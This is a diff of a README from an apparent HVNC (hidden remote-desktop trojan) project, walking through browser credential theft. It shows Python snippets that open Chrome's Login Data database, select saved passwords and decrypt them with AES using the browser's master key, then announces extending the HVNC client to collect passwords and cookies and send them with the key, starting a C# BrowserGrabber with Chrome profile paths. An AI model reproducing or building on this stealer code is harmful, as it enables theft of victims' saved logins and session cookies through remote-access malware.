DevilBot000/HVNC-HTML/README.md

         return decrypted_pass
     except Exception as e:
-        return f"Error decrypting password: {e}" [/CODE] Skips the first 3 characters and defines characters 4 to 15 as IV.
+        return f"Error decrypting password: {e}"
+Skips the first 3 characters and defines characters 4 to 15 as IV.
 Then from the 15th character to the end it defines it as a password.
 Decrypts the password via AES using the key specified below.
-[CODE=python]
+[python]

     login_data_path
-[/CODE] Path to the database file with passwords [CODE=python]
+Path to the database file with passwords
+[python]

     connection = sqlite3.connect(login_data_path)
     cursor = connection.cursor()
- [/CODE] Connect to the database
+ Connect to the database
-[CODE=python]
+[python]

     cursor.execute("SELECT password_value FROM logins")
-[/CODE] Execute a query against the logins table and within it against the password_value column [CODE=python]
+Execute a query against the logins table and within it against the password_value column [python]

-    master_key_base64 [/CODE] Key in base 64 format [CODE=python]
+    master_key_base64 [/CODE] Key in base 64 format [python]

     master_key = base64.b64decode(master_key_base64)
-[/CODE] Decoding the key into bytes
+Decoding the key into bytes

 We have looked at the example, now we will implement this in practice inside our HVNC project.

 First, let's expand the client so that it can collect passwords and cookies and send them along with the key.

 First of all, let's create the BrowserGrabber method.
 Inside the method we will specify the dictionary to the main browser folders where the file with the key is located.
-[CODE]

     Dictionary<string, string> browserPaths = new Dictionary<string, string>{
     { "Google Chrome", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), @"Google\Chrome\User Data ") },